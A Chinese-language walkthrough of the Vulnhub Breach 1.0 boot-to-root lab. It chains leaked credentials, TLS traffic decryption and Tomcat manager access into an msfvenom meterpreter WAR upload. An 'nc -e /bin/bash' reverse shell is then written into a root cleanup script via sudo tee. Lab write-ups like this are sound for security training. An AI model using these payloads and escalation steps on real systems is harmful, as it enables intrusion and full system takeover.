当前位置: 首页 > news >正文

Vulnhub实战靶场Breach1.0

这次做一个Vulhub 实战靶场 Breach1.0

参考学习: https://www.cnblogs.com/sym945/p/13604758.html

前言

Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。

VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。作者期待大家写出文章,特别是通过非预期的方式获取root权限。

环境配置

启动虚拟机,因为靶场虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only仅主机的方式,我将kali攻击机,添加了一块虚拟网卡,第二块网卡设置的网段跟虚拟机同一网段。

开始实验

下载好靶机,并且启动

知道了靶场环境的ip地址,所以可以直接使用nmap扫描端口,查询突破口,但是扫描之后发现端口全是打开的,显然是做了防端口扫描。

根据靶场规律,直接访问ip地址,发现有http服务。

查看网页源代码,发现有一串base64加密的字符串。

Base64解密连续解密两次

echo Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo | base64 -d

echocGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh| base64 -d

解密结果如下:

pgibbons:damnitfeel$goodtobeagang$ta初次推断可能是账号和密码

而且除了字符串,源码里还有个文件地址,打开访问发现另外的页面

访问页面,跳转到如下页面

点击Employee portal,进入到impresscms的登录界面。

想到之前的base64解密结果pgibbons:damnitfeel$goodtobeagang$ta
尝试用这个来登录

可以登录成功,页面如下:

使用命令,searchsploit impresscms,找到impresscms的/modules/profile/admin/field.php文件存在SQL注入漏洞,想要利用,但是发现没有权限访问该文件。

那就回到网页,看到有3个邮件消息,看是否有提示信息

查看前两份邮件,没有任何有用的信息,直到第三份邮件发现了关键信息。

第3封邮件,主要内容:有一个peter的SSL证书被保存在192.168.110.140/.keystore

根据邮件提示,到下载包含SSL证书的密钥库keystore文件,keystore是存储公私密钥的一种文件格式,下载下来保存好。

点击home,进入index.php

再点击content

在新界面里面发现了链接。

点开提示的,http://192.168.110.140/impresscms/modules/content/content.php?content_id=1,发现一个流量包文件,下载下来。

而且还有提示信息:They told me the alias, storepassword and keypassword are all set to 'tomcat'

别名、Keystore密码、key密码都设置成tomcat。由此推测:

1)这是一个流量包文件,不能读取很可能因为某些流量有SSL加密(前面的邮件中提供了一个keystore,这里提供了密码;

2)系统中可能存在tomcat。

在下载了keystore文件的目录中打开终端,输入命令:keytool -list -keystore Untitled.keystore,输入口令tomcat,查看keystore密钥库中的证书。

接下来,从密钥库导出.p12证书,将keystore拷贝到keytool目录,导出名为:tomcatkeystore.p12的证书,输入命令:keytool -importkeystore -srckeystore Untitled.keystore -destkeystore tomcatkeystore.p12 -deststoretype PKCS12 -srcalias tomcat

将生成的tomcatkeystore.p12证书导入wireshark,点击编辑--首选项--Protocols--TLS,点击Edit编辑,IPaddress填写192.168.110.140,Port填写8443,Protocol填写http,Key File选择生成的tomcatkeystore.p12文件,Password填写tomcat。

分析浏览量数据包,发现一个Unauthorized的认证包,该request和response包含了Tomcat后台的登录地址:https://192.168.110.140:8443/_M@nag3Me/html

把信息提取出来:

tomcat:Tt\5D8F(#!*u=G)4m7zB 可能是账号和密码

https://192.168.110.140:8443/_M@nag3Me/html

直接访问会显示建立安全连接失败

这个时候需要打开burp suite但不开启拦截

打开代理,重新打开网页会出现登录框,把之前tomcat:Tt\5D8F(#!*u=G)4m7zB输入进去。

成功登录到后台。

有上传文件的功能,可以生产一个木马文件,

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=1234-f war -o shell.war

使用msf ,参数设置成自己刚刚设置的

把shell.war上传到网站。

上传成功后,访问https://192.168.110.140:8443/shell/shell.jsp,在msf下顺利拿到shell

查看当前用户;cat /etc/passwd 收集信息,看到两个值得关注的账户。

在/var/www/5446目录下,看到两个文件名很特殊的文件。

查看文件,发现是mysql的数据库连接文件,使用的root账户,不需要密码。

输入命令,mysql -u root -p ,进入mysql,提示输入密码,直接回车,成功连接进入mysql数据库,查看账号密码,得到milton账户的密码哈希,解密为:thelaststraw

通过密码thelaststraw 来登录milton账户。

退出mysql,使用命令,su milton,输入密码,成功登录milton账户

账户milton目录下,发现的some_script.sh脚本,没有可利用的地方

查看历史命令,发现有切换到blumbergh这个账户的操作,操作之后有切换到root的操作,所以可能提权要进入到blumbergh这个账户。

继续收集信息,http://192.168.110.140/images/,目录下找到6张图片,milton用户目录下,发现1张图片。

使用exiftool工具,查看图片,输入命令:exiftool bill.png ,发现密码:coffeestains

切换到blumbergh账户,输入之前图片中得到的密码,切换成功。

进入blumbergh目录下,查看blumbergh账户的历史命令,发现/usr/share/cleanup目录下的,tidyup.sh脚本文件。

一样进入目录,查看脚本,为root账户才能读写的,用来清理删除webapps目录下的文件的脚本。

echo "nc -e /bin/bash 192.168.110.122 2345" > shell.txt,将nc执行的反弹shell命令,写入到shell.txt文件

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh,使用tee命令将shell.txt内容输出到tidyup.sh

打开另一个终端,输入nc -lvvp 2345,监听2345端口的动静,等到一段时间,成功接到root的shell。

查看/root目录下,有个flair.jpg的文件,应该是最后的flag,将文件再次复制到/var/www/html/images中,查看图片,成功得到flag。

这个图片感觉不算是flag,回到一开始的目录下。

ls -a 发现有.flag.txt文件,直接cat一下,拿到flag,这个才是真正的flag。

结束!

http://www.cnnetsun.cn/news/195485.html

相关文章:

  • CircuitJS1 Desktop Mod完全掌握:零基础电路仿真实战宝典
  • 解锁全球通信自由:Nrfr如何让你的手机真正“本地化“
  • 9、Windows应用开发中的功能实现与实用类解析
  • 12、俄罗斯方块与绘图应用开发详解
  • 网页转图片利器:wkhtmltoimage零基础入门指南
  • 终极网页截图工具:wkhtmltoimage完整使用指南
  • Mac Mouse Fix:为什么你的鼠标在Mac上需要一次“性能升级“?
  • FramePack实战指南:5分钟掌握AI舞蹈视频制作全流程
  • 深岩银河存档编辑器:3分钟学会游戏资源自由调配
  • LangFlow品牌视觉识别系统(VI)设计理念
  • Free-NTFS-for-Mac终极指南:如何免费解锁Mac完整NTFS读写权限
  • ScienceDecrypting:彻底告别加密文档困扰的终极解决方案
  • LanzouAPI直链解析核心技术揭秘:如何实现蓝奏云高速下载的终极方案
  • Windows更新故障全攻略:从诊断到修复的一站式解决方案
  • 为什么90%的设计师都在使用Ai2Psd工具?揭秘AI到PSD无损转换的终极方案
  • Zotero Reference:5分钟搞定PDF参考文献智能管理
  • Navicat Mac版试用期重置技术解析与实践指南
  • HLS流媒体下载终极指南:轻松捕获在线视频的高效方法
  • LRCGET歌词下载神器:彻底解决离线音乐库歌词同步难题
  • 炉石传说脚本终极指南:游戏自动化的智能助手高效技巧
  • 哔哩哔哩漫画批量下载完整教程:从入门到精通
  • 革命性3D模型预览方案:让Windows资源管理器智能化升级
  • Windows苹果设备驱动完整安装指南:一键解决连接烦恼
  • ParquetViewer终极指南:让复杂数据文件变得简单易懂的桌面利器
  • ExifToolGui元数据管理实战:5分钟解决RAW文件兼容性难题
  • TsubakiTranslator:免费实时游戏翻译工具,轻松突破语言壁垒
  • 苹果驱动安装文章创作指南
  • LangFlow静态资源压缩优化
  • OpenCore Configurator架构设计与技术实现分析
  • Lua逆向工程快速上手:从字节码到源码的完整实战技巧